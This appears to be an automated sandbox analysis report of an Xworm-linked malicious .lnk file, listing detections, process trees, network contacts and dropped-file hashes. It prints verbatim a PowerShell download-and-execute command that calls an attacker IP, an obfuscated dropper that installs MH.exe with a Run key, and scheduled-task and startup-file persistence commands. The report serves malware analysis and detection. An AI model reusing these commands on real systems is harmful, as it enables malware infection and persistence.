Analysis Overview
SHA256
b2e7a3022632bed225763f5b5678db00032999a013bd70abcbe134c334f9a831
Threat Level: Known bad
The file b2e7a3022632bed225763f5b5678db00032999a013bd70abcbe134c334f9a831.lnk was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Xworm
Detect Xworm Payload
Detects Windows executables referencing non-Windows User-Agents
Downloads MZ/PE file
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Drops startup file
Executes dropped EXE
Checks computer location settings
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Kills process with taskkill
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Enumerates processes with tasklist
Suspicious use of SetWindowsHookEx
Creates scheduled task(s)
Runs ping.exe
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-12 02:02
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-12 02:02
Reported
2024-06-12 02:04
Platform
win7-20240215-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2388 wrote to memory of 2592 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2388 wrote to memory of 2592 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2388 wrote to memory of 2592 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2592 wrote to memory of 2136 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2592 wrote to memory of 2136 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2592 wrote to memory of 2136 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\b2e7a3022632bed225763f5b5678db00032999a013bd70abcbe134c334f9a831.lnk
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c powershell -command "$url='http://94.154.172.166/wvqv/ex.png';$path='C:\Users\Public\';Invoke-WebRequest -Uri $url -OutFile \"C:\Users\Admin\Downloads\ex.zip\";Expand-Archive -Path \"C:\Users\Admin\Downloads\ex.zip\" -DestinationPath $path;while($true){if(Test-Path 'C:\Users\Public\ex.hta'){Start-Process 'C:\Users\Public\ex.hta';break}else{Start-Sleep 0.5}};Remove-Item -Path \"C:\Users\Admin\Downloads\ex.zip\" -Force;taskkill /F /IM msedge.exe;taskkill /F /IM cmd.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "$url='http://94.154.172.166/wvqv/ex.png';$path='C:\Users\Public\';Invoke-WebRequest -Uri $url -OutFile \"C:\Users\Admin\Downloads\ex.zip\";Expand-Archive -Path \"C:\Users\Admin\Downloads\ex.zip\" -DestinationPath $path;while($true){if(Test-Path 'C:\Users\Public\ex.hta'){Start-Process 'C:\Users\Public\ex.hta';break}else{Start-Sleep 0.5}};Remove-Item -Path \"C:\Users\Admin\Downloads\ex.zip\" -Force;taskkill /F /IM msedge.exe;taskkill /F /IM cmd.exe"
Network
Files
memory/2136-40-0x000007FEF5DBE000-0x000007FEF5DBF000-memory.dmp
memory/2136-41-0x000000001B4D0000-0x000000001B7B2000-memory.dmp
memory/2136-42-0x00000000028E0000-0x00000000028E8000-memory.dmp
memory/2136-43-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
memory/2136-44-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
memory/2136-46-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
memory/2136-45-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
memory/2136-47-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
memory/2136-48-0x000007FEF5DBE000-0x000007FEF5DBF000-memory.dmp
memory/2136-49-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
memory/2136-50-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
memory/2136-51-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
memory/2136-52-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-12 02:02
Reported
2024-06-12 02:04
Platform
win10v2004-20240611-en
Max time kernel
142s
Max time network
151s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 540 created 3472 | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\Suse.pif | C:\Windows\Explorer.EXE |
| PID 540 created 3472 | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\Suse.pif | C:\Windows\Explorer.EXE |
| PID 540 created 3472 | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\Suse.pif | C:\Windows\Explorer.EXE |
Xworm
Detects Windows executables referencing non-Windows User-Agents
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\MH.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindWave360X.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindWave360X.url | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MH.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\Suse.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\RegAsm.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ekHss = "C:\\Users\\Admin\\AppData\\Roaming\\MH.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\RegAsm.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\Suse.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\Suse.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\Suse.pif | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\Suse.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\Suse.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\Suse.pif | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\b2e7a3022632bed225763f5b5678db00032999a013bd70abcbe134c334f9a831.lnk
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c powershell -command "$url='http://94.154.172.166/wvqv/ex.png';$path='C:\Users\Public\';Invoke-WebRequest -Uri $url -OutFile \"C:\Users\Admin\Downloads\ex.zip\";Expand-Archive -Path \"C:\Users\Admin\Downloads\ex.zip\" -DestinationPath $path;while($true){if(Test-Path 'C:\Users\Public\ex.hta'){Start-Process 'C:\Users\Public\ex.hta';break}else{Start-Sleep 0.5}};Remove-Item -Path \"C:\Users\Admin\Downloads\ex.zip\" -Force;taskkill /F /IM msedge.exe;taskkill /F /IM cmd.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "$url='http://94.154.172.166/wvqv/ex.png';$path='C:\Users\Public\';Invoke-WebRequest -Uri $url -OutFile \"C:\Users\Admin\Downloads\ex.zip\";Expand-Archive -Path \"C:\Users\Admin\Downloads\ex.zip\" -DestinationPath $path;while($true){if(Test-Path 'C:\Users\Public\ex.hta'){Start-Process 'C:\Users\Public\ex.hta';break}else{Start-Sleep 0.5}};Remove-Item -Path \"C:\Users\Admin\Downloads\ex.zip\" -Force;taskkill /F /IM msedge.exe;taskkill /F /IM cmd.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4108,i,8998666007764333392,14724298544432336038,262144 --variations-seed-version --mojo-platform-channel-handle=4464 /prefetch:8
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\ex.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\system32\taskkill.exe
"C:\Windows\system32\taskkill.exe" /F /IM msedge.exe
C:\Windows\system32\taskkill.exe
"C:\Windows\system32\taskkill.exe" /F /IM cmd.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function Ogwbjtfp($T, $u){[IO.File]::WriteAllBytes($T, $u)};function ohbwFx($T){if($T.EndsWith((dQEjGdC @(29246,29300,29308,29308))) -eq $True){Start-Process (dQEjGdC @(29314,29317,29310,29300,29308,29308,29251,29250,29246,29301,29320,29301)) $T}else{Start-Process $T}};function eKBMFfVL($T, $VGRzc){[Microsoft.Win32.Registry]::SetValue((dQEjGdC @(29272,29275,29269,29289,29295,29267,29285,29282,29282,29269,29278,29284,29295,29285,29283,29269,29282,29292,29283,29311,29302,29316,29319,29297,29314,29301,29292,29277,29305,29299,29314,29311,29315,29311,29302,29316,29292,29287,29305,29310,29300,29311,29319,29315,29292,29267,29317,29314,29314,29301,29310,29316,29286,29301,29314,29315,29305,29311,29310,29292,29282,29317,29310)), $VGRzc, $T)};function NWlHxf($N){$He = New-Object (dQEjGdC @(29278,29301,29316,29246,29287,29301,29298,29267,29308,29305,29301,29310,29316));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$u = $He.DownloadData($N);return $u};function dQEjGdC($Q){$W=29200;$H=$Null;foreach($jD in $Q){$H+=[char]($jD-$W)};return $H};function uIIKJuV(){$jtDLr = $env:APPDATA + '\';$iqggj = NWlHxf (dQEjGdC @(29304,29316,29316,29312,29258,29247,29247,29257,29252,29246,29249,29253,29252,29246,29249,29255,29250,29246,29249,29254,29254,29247,29319,29318,29313,29318,29247,29277,29272,29246,29301,29320,29301));$nYlataiU = $jtDLr + 'MH.exe';Ogwbjtfp $nYlataiU $iqggj;ohbwFx $nYlataiU;$VGRzc = 'ekHss';eKBMFfVL $nYlataiU $VGRzc;;;;}uIIKJuV;
C:\Users\Admin\AppData\Roaming\MH.exe
"C:\Users\Admin\AppData\Roaming\MH.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k copy Adrian Adrian.cmd & Adrian.cmd & exit
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 824903
C:\Windows\SysWOW64\findstr.exe
findstr /V "RELAXATIONTENNISYOURSSCAN" Seek
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Measurements + Asked + Report 824903\t
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\Suse.pif
824903\Suse.pif 824903\t
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks.exe /create /tn "Preferred" /tr "wscript //B 'C:\Users\Admin\AppData\Local\WaveMind360 Elite Innovations Co\MindWave360X.js'" /sc minute /mo 5 /F
C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindWave360X.url" & echo URL="C:\Users\Admin\AppData\Local\WaveMind360 Elite Innovations Co\MindWave360X.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindWave360X.url" & exit
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "Preferred" /tr "wscript //B 'C:\Users\Admin\AppData\Local\WaveMind360 Elite Innovations Co\MindWave360X.js'" /sc minute /mo 5 /F
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\RegAsm.exe
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\RegAsm.exe
Network
| Country | Destination | Domain | Proto |
| SG | 94.154.172.166:80 | 94.154.172.166 | tcp |
| US | 8.8.8.8:53 | 166.172.154.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| SG | 94.154.172.166:80 | 94.154.172.166 | tcp |
| US | 8.8.8.8:53 | PVgQNHszldiRVxJpoZszvCOlfluc.PVgQNHszldiRVxJpoZszvCOlfluc | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 235.3.20.104.in-addr.arpa | udp |
| IE | 52.111.236.22:443 | | tcp |
| NL | 91.92.249.142:8989 | | tcp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| NL | 91.92.249.142:8989 | | tcp |
| NL | 91.92.249.142:8989 | | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| NL | 91.92.249.142:8989 | | tcp |
| NL | 91.92.249.142:8989 | | tcp |
| NL | 91.92.249.142:8989 | | tcp |
| NL | 91.92.249.142:8989 | | tcp |
| NL | 91.92.249.142:8989 | | tcp |
Files
memory/4376-0-0x00007FFCF9193000-0x00007FFCF9195000-memory.dmp
memory/4376-1-0x000001E0F85D0000-0x000001E0F85F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j44kkczl.sja.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4376-11-0x00007FFCF9190000-0x00007FFCF9C51000-memory.dmp
memory/4376-12-0x00007FFCF9190000-0x00007FFCF9C51000-memory.dmp
memory/4376-14-0x00007FFCF9190000-0x00007FFCF9C51000-memory.dmp
memory/4376-15-0x000001E0F8AC0000-0x000001E0F8AD2000-memory.dmp
memory/4376-16-0x000001E0F8A90000-0x000001E0F8A9A000-memory.dmp
C:\Users\Public\ex.hta
| MD5 | eacf551dfa36547012067ef99ecc7b35 |
| SHA1 | a093355da2ac098174d3fe9f47cfb75c890ccb64 |
| SHA256 | 7be03d1f8b55a71b2335ba295346a62a0d5e985637559d2da7c39185731fdd1a |
| SHA512 | aed6203690051eb3e4d9fd5604ee45e760ec939206cfff063c55d0be53994775403241fa2b85007103c40a507bd0eb385a32dd2b0089f4e3596aa22e225c92f3 |
memory/4376-25-0x00007FFCF9190000-0x00007FFCF9C51000-memory.dmp
memory/1696-26-0x0000000004500000-0x0000000004536000-memory.dmp
memory/1696-27-0x0000000004CF0000-0x0000000005318000-memory.dmp
memory/1696-28-0x0000000004C10000-0x0000000004C32000-memory.dmp
memory/1696-29-0x0000000005410000-0x0000000005476000-memory.dmp
memory/1696-30-0x0000000005480000-0x00000000054E6000-memory.dmp
memory/1696-40-0x0000000005680000-0x00000000059D4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 28571adbb0c6967b9a6c34862c6b565f |
| SHA1 | 76381cfebeedc049fbf674f1152bdfd6d92d2337 |
| SHA256 | 6d00e49a963023342212cecdd4fd11bb15a1894127f1a883bf3d89609132db0b |
| SHA512 | 7293ce620256ae35381e27ae9f0696c6911bea0d12bb70079e8f68b35f8aadcca7dccf8aefdd670761925a50137b017e22ba345bcaa710695c9371649ab93364 |
memory/1696-42-0x0000000005AB0000-0x0000000005ACE000-memory.dmp
memory/1696-43-0x0000000005B00000-0x0000000005B4C000-memory.dmp
memory/1696-44-0x00000000072B0000-0x000000000792A000-memory.dmp
memory/1696-45-0x0000000006060000-0x000000000607A000-memory.dmp
memory/1696-47-0x0000000006FD0000-0x0000000007066000-memory.dmp
memory/1696-48-0x0000000006F70000-0x0000000006F92000-memory.dmp
memory/1696-49-0x000000000CEE0000-0x000000000D484000-memory.dmp
C:\Users\Admin\AppData\Roaming\MH.exe
| MD5 | fb1cd25e6a5154eb70d1f10c56b41ca6 |
| SHA1 | c294d819ff140d153dac91df321b7135d5e59ede |
| SHA256 | 68535d5ca02f0c0bbd40b4ec132111abcb835945095498bb6c5eec282042818f |
| SHA512 | dcd241be029953a436fca00ec3eb8f9d3dd3b78d84c3143bdc7f5fc5829c23b3ad0ff8a04745fb9743edf8fdcb959f2095c4a591fe0b3e0e03fe739abfa48b8b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Adrian
| MD5 | 669bcb845485adbcaed94cee013b506d |
| SHA1 | 6c4e86b2fbd3f1d1a0ae44403a7d8617de533dc6 |
| SHA256 | 879480c9b69cfc918318d9cedcdb5c06038dc1108a9cf6ce9ef63eff89974757 |
| SHA512 | b8719eddda11472f8023b6205b2f225eea1aee861161906b1a6002143b3493c844cab2e315a386d88fac38341860c60be613ded40a073984e4b496942a6dd469 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Seek
| MD5 | 8aca5459b5f158e0ed914703c45bd5b8 |
| SHA1 | 44a0c6306ef7dcbd45ddc1d3143badcb8db4219d |
| SHA256 | 79187028f716e643081f3c14e5cc25ca6280ef8d87b1913663c64bfca1b46a47 |
| SHA512 | c10a6120f108671ebe38b38580364dd2565088b2cf7d7fbba38f738c7424eabfb1362fa765e21ff713affa30016df97f26af249fa85523e38f7236ffed4cb186 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Planned
| MD5 | 99012f57b2e272c1d30b732d3a9f17fd |
| SHA1 | 0f166ffceed30fe753799bd7fbfa4852848f72c2 |
| SHA256 | 4776ce1bebd9bc4890ba149d1b6a6695c7e9d8ac95b932ffb58f02d5f4d14875 |
| SHA512 | f12b81498a5e71edc47de26706b924e5f0f48e4a1096632c4fbf3a286828ea1c09ab04e6dce164df885bee081d5bdfce18def9d43ea1123b4415b4864e3d8fb8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Me
| MD5 | c58fc578f490d1ad28c01b6080af1259 |
| SHA1 | 114fd98f30a53b122f73ea6466d6cb68fe2f0896 |
| SHA256 | 1ae3afce9c7787b42ae8b543fc5412a99a7ff2540116b59c4c3f8b82c75742fa |
| SHA512 | 6afa9b5ec23cb3936fc2a2fb11ea2d63f61ef08ee777a35844aa5209438c52f00e256f42f201eda31fee055f166be2b27a38ab500d1176c5892652800dcca47f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Activists
| MD5 | 05bf8eaa80ed61c659b29fbbc5210e15 |
| SHA1 | 09d54bfe876025303f5f6195adfd3deb9e009695 |
| SHA256 | bee181608b58e65ae70586ce1fea3f8666adbdf180c7a2090e0d7a76307436d1 |
| SHA512 | 7d528b570d48d6d112d636924ac3f2812332a3884c90113fb787c3958ed351e75ab2bb77203816712199bd7310e8e5b0bb70d0ce8809ab088e8464386ebf114f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Appearance
| MD5 | a02321b286bb90393ee73f07182af12a |
| SHA1 | c4e4bdfccd9754bea38d42a41be8a36e4efdcfd9 |
| SHA256 | ebe905d945c10ad2aa3d31e6faac37fd119e0000b12111b99fdaf436506a6a6e |
| SHA512 | f6b0c2a5d4b773f4f2769cc31f425ad9d1420187ab757d7bfa131612419efc81a98d2358920a0e4e2de08d16ed3907fc8620895822d4c0a0e4372bdcd21fa025 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Accidents
| MD5 | 7c2436e544a3abd424d29343a41366d0 |
| SHA1 | 139e3da90cfca5825161ce8f5af519b1db2c95c0 |
| SHA256 | 01678427aeec32aa7babdeeb5804a48c77eb4b0a8ce75dcaa9dd603a5f27db82 |
| SHA512 | e4725d4ca1b865fc0eb400fa15fdb06a66378c87819447443322a4eb55d1ac8a2715cdadffae10fe28c141fa4bd98aba1ba7a8d53e19ef0ebb9ec775e88ba511 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Jamaica
| MD5 | a39644e2ce927c92272cf8107fb3327b |
| SHA1 | 26c8d5eb1539b64398d9b23913a05ec070773f9c |
| SHA256 | 85d4421aee35da360bb53ae599549fddb4b1463d36770db3fdc1ffb89f985fd0 |
| SHA512 | 015ca51a93ab2ffd345302cb0948ae653b780effc08bd86aea2dfd8098a2a48c94c817059b55dd5325ebb8edcf81ac0d052df2b1ac698f9837bc8272f0786449 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Persistent
| MD5 | 8d2121bb8a9b7ad27e69e1bc957f8979 |
| SHA1 | 3fe2d692d2af03c4d36dfac9f3fde4d00edc1716 |
| SHA256 | aaba07f2e70929d5f4f3912dea2e71495ebca035873037afb9a9a3f678fdc7cf |
| SHA512 | c4fe975c8ee22a53c9131b231612591601035b9401a8f88f05dbdae3edf198d9c119c055df5f4bf44fc1e42ad9a49819a791e412460f776b552a2930bbea84e9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Numerical
| MD5 | 6c714307641de8c93d261ed9cc77646e |
| SHA1 | 6cba8af80995c69b1952cd36c03b70dbfeb8cae2 |
| SHA256 | cd65eb96896d272cbc5b0983ab6f4e22531234b8d135a74775a6e1cf373b9018 |
| SHA512 | 3fa4f131d511de5bd5f1cddaf888a214e152444045ac1495f2f643aaf6b36d866a81867a53006e6eae6e9670e53b2ab06b84363e1f05dc5efbfed00b014d9a9d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Calvin
| MD5 | 4d19078157a311f1346f191caea7e509 |
| SHA1 | 8121ad256d953cd92cf8dfa9534c1b6faf997832 |
| SHA256 | f6f2c4c9ed18d938a44faeea9da23c817f0fc0768c4aab5e4440c68c16f703a0 |
| SHA512 | db30db32616d0603584cf68691af76f814da57ff1ed0e7914df796d688fb262239041d6089b31f27f09d8f306718b54b3a65070999890becb716672c43c10822 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Endorsement
| MD5 | 4a26c986918b78352da428c9880ca685 |
| SHA1 | cb2f1211d2f87f3b9494d0a83f574b1e58835184 |
| SHA256 | b327e7db0d1ac5cad2b1935a1708bab247664fb009fd923a1153933d24a920bf |
| SHA512 | be84ac35b5d32899fc2a5420df08ffb45eefe510e64f08a7ec9efc5443c18496a679bf4b277754ffb43915e5681bd9c2a628c10b41f94504aa9ed2988225012d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Lesbian
| MD5 | 619654a36360c018f16e384fd1e6b387 |
| SHA1 | b232c087e34fda965d6f88bde7a35664d796f1c3 |
| SHA256 | fa44132bde285d5768d4d952c358b40469304aeb3b66ee8cdb4a54fb575d40c7 |
| SHA512 | dca163feea318903e535d899300df1d7e9ff6c1639c166c0d4ba8060735f081ee931e613b218cb9aa71f198ad9d9569c6dcf667265b904519cae8b8bbf5b71e0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Spring
| MD5 | 72f0225d667c4395eab1c35726d56f36 |
| SHA1 | c57f5a6d4953b7b7c8fd9fe1c1217b880ca4d9e0 |
| SHA256 | 7b69034a324e195ef42af77762c22b5894b9b36787942fa2cb42390c7d30673a |
| SHA512 | fc7bb12e8984d9fc7ccba5c3ad3b7f2d84ab00a561c0a884d2bde15b8b990bf5682615f49ed0b8ac609a6b5c7e2ac06fc363b852b49c9ba64759ba7b6204ac6a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Fr
| MD5 | fe66f07a1dc3527572e662308b33f2d1 |
| SHA1 | 8eaef41529ddfc9ad45df088b40265d75a590546 |
| SHA256 | e68d5a6047ce198cc348da288cea64dfa8d3cdc534bdb095b123b1c796fbceff |
| SHA512 | 2f6c8e2c1ece9d69f8b7707ee4a0ff9cef3fba652c4ab22172f756563ff2d016326c7e62629d4af11920c7251de4ea78f0b26530340bfca18b1288df5ec2cb0b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Information
| MD5 | 2113d64d2825d8f335cb97226dedcf21 |
| SHA1 | 717127436c7d315618099ef3788b4f8a2efb04f9 |
| SHA256 | 3c83b5d248f30faf27709bf466d8410319d42f31dd02767c2a6cf35488e87578 |
| SHA512 | 9170c1150a348badbdab5aa177f2963bae784e55a22fe273cf9934ae82581c43b80230e4535dc2fa21e7b421712790bf4326aa68c166ed1ade802d0ff7a3ec7d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Education
| MD5 | e0e36a8fab76f17638d4c66d7bf47387 |
